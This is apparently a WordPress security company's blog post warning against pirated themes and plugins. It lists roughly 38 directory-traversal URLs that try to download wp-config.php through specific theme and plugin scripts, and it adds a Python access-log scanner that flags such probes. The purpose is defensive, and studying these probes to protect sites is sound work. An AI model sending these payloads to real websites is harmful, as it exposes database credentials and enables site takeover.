
Reason for avoiding pirated WordPress plugins and themes - they have hidden malware

The popularity of the WordPress website management system makes it a target for hackers, and millions of WordPress-driven websites are hacked daily. The problem, however, is not the core WordPress system, which is very secure; it is the "free" pirated plugins and themes that weaken the framework.

If you are serious about doing business online and you choose the popular WordPress framework, it is best to pay for the secure plugins rather than seek out pirated versions. Those "free" copies of normally paid software are generally injected with "backdoor" code that gives someone else easy entry to your hosting account.

The lists below show how a hacker who distributes 'free' plugins and themes tries to locate his hidden malware and gain access to a WordPress website's admin area, database or FTP.

These are URLs entered in the standard browser address bar. Each one asks a download script bundled with the theme or plugin for a file, but the file parameter walks up the directory tree (the "../" segments) until it reaches wp-config.php. If the script is present on an unfortunate WordPress website, wp-config.php is returned and gives away the database username and password, the database can then be accessed remotely, and the hacker adds himself as an administrator. His next action is to log in to the WordPress site, install an FTP plugin and gain full access to the hosting FTP area.

Protect your website by using legitimately purchased WordPress software. If a fly-by-night webmaster offers pirated free scripts that are normally sold by a hard-working developer, just flip them the bird!


This list shows the hacker checking a WordPress website to see whether it uses one of his pirated themes, in which he stored a file named download.php. If the file is found, a query is sent that triggers a download of the wp-config.php file, which provides the database username and password.

  • /wp-content/themes/urbancity/lib/scripts/download.php?file=../../../../../wp-config.php
  • /wp-content/themes/trinity/lib/scripts/download.php?file=../../../../../wp-config.php
  • /wp-content/themes/parallelus-salutation/framework/utilities/download/getfile.php?file=../../../../../../wp-config.php
  • /wp-content/themes/parallelus-mingle/framework/utilities/download/getfile.php?file=../../../../../../wp-config.php
  • /wp-content/themes/lote27/download.php?download=../../../wp-config.php
  • /wp-content/themes/linenity/functions/download.php?imgurl=../../../../wp-config.php
  • /wp-content/themes/epic/includes/download.php?file=../../../../wp-config.php
  • /wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php
  • /wp-content/themes/authentic/includes/download.php?file=../../../../wp-config.php
  • /wp-content/themes/antioch/lib/scripts/download.php?file=../../../../../wp-config.php
  • /wp-content/themes/NativeChurch/download/download.php?file=../../../../wp-config.php
  • /wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php?filename=../../../../wp-config.php

In this list the goal is the same, the wp-config.php file, but the hacker now checks other plugins for known hidden backdoor files. Several of these paths (the revslider_show_image requests, for example) are also known arbitrary-file-download flaws in plugins that were installed legitimately but never updated, so keeping plugins patched matters as much as where they came from.

  • /wp-content/plugins/wp-filemanager/incl/libfile.php?&path=../../&filename=wp-config.php&action=download
  • /wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php?href=../../../../wp-config.php
  • /wp-content/plugins/simple-download-button-shortcode/simple-download-button_dl.php?file=../../../../wp-config.php
  • /wp-content/plugins/plugin-newsletter/preview.php?data=../../../../wp-config.php
  • /wp-content/plugins/pica-photo-gallery/picadownload.php?imgname=../../../wp-config.php
  • /wp-content/plugins/google-mp3-audio-player/direct_download.php?file=../../../wp-config.php
  • /wp-content/plugins/dukapress/lib/dp_image.php?src=../../../../wp-config.php
  • /wp-content/plugins/db-backup/download.php?file=../../../wp-config.php
  • /wp-content/plugins/s3bubble-amazon-s3-html-5-video-with-adverts/assets/plugins/ultimate/content/downloader.php?path=../../../../../../../wp-config.php
  • /wp-content/force-download.php?file=../wp-config.php
  • /wp-content/blog/secondaryphase/mdocs-posts/?mdocs-img-preview=../../../wp-config.php
  • /wp-admin/tools.php?page=backup_manager&download_backup_file=../wp-config.php
  • /wp-admin/blog/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
  • /wp-admin/admin-ajax.php?action=showbiz_show_image&img=../wp-config.php
  • /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
  • /wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php
  • /wp-admin/admin-ajax.php?action=kbslider_show_image&img=../wp-config.php
  • /wp-admin/admin-ajax.php?action=fe_get_sv_html&video=../wp-config.php
  • /wp-admin/admin-ajax.php?action=cpabc_appointments_calendar_update&cpabc_calendar_update=1&id=../../../../../../wp-config.php
  • /wordpress/wp-admin/admin.php?page=multi_metabox_listing&action=edit&id=../../../../../../wp-config.php
  • /wordpress/wp-admin/admin-ajax.php?action=cpabc_appointments_calendar_update&cpabc_calendar_update=1&id=../../../../../../wp-config.php
  • /mdocs-posts/?mdocs-img-preview=../../../wp-config.php
  • /index.php/photocrati_ajax?action=upload_image&gallery_id=0&gallery_name=../../../../wp-config.php
  • /index.php/mdocs-posts/?mdocs-img-preview=../../../wp-config.php
  • /blog/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
  • /blog/secondaryphase/mdocs-posts/?mdocs-img-preview=../../../wp-config.php
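Because every request above shares the same shape, a "../" walk that ends in wp-config.php, a site owner can spot them in the web server access log. The following is an added Python example (not from this site) that scans constructed combined-format log lines, decodes URL encoding so "%2F" and double-encoded variants do not slip past, and flags any such request, treating a 200 response as a sign that wp-config.php was actually served. The log lines and IP addresses (documentation ranges) are constructed for the demo.

```python
import re
from urllib.parse import unquote

# Constructed access-log sample in Apache/Nginx combined format (not real traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [10/Mar/2019:12:00:01 +0000] "GET /wp-content/themes/urbancity/lib/scripts/download.php?file=../../../../../wp-config.php HTTP/1.1" 404 212 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Mar/2019:12:00:02 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1" 200 3201 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Mar/2019:12:05:40 +0000] "GET /wp-content/plugins/db-backup/download.php?file=..%2F..%2F..%2Fwp-config.php HTTP/1.1" 404 212 "-" "curl/7.64.0"
192.0.2.10 - - [10/Mar/2019:12:06:00 +0000] "GET /index.php HTTP/1.1" 200 14890 "-" "Mozilla/5.0"
192.0.2.10 - - [10/Mar/2019:12:06:01 +0000] "GET /wp-content/themes/demo/style.css HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

# ip, timestamp, method, request path (query string included), status, size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)
TRAVERSAL_RE = re.compile(r'\.\./|\.\.\\')  # "../" or "..\"

def normalize(path):
    """Decode twice so double-encoded %252e%252e%252f is seen as '../' too."""
    return unquote(unquote(path)).lower()

def is_wpconfig_traversal(path):
    """True when the request climbs the tree and names wp-config.php."""
    p = normalize(path)
    return "wp-config.php" in p and TRAVERSAL_RE.search(p) is not None

def scan(log_text):
    """Return one finding per matching request; a 200 means the file likely left the server."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or not is_wpconfig_traversal(m["path"]):
            continue
        status = int(m["status"])
        verdict = ("SERVED: treat wp-config.php as exposed, rotate DB password and salts"
                   if status == 200 else "probe blocked")
        hits.append({"ip": m["ip"], "ts": m["ts"], "path": m["path"],
                     "status": status, "verdict": verdict})
    return hits

if __name__ == "__main__":
    for h in scan(SAMPLE_LOG):
        print(h["ip"], h["status"], h["verdict"], h["path"])
```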


Most likely these probe lists are published on hacker forums and used by millions of 'dark web' users around the world, so attempts will be relentless.


WebsiteDons.com 813-319-4253 Owned and operated by Emuzement Net Inc.

Copyright © 2019 WebsiteDons.com. All Rights Reserved.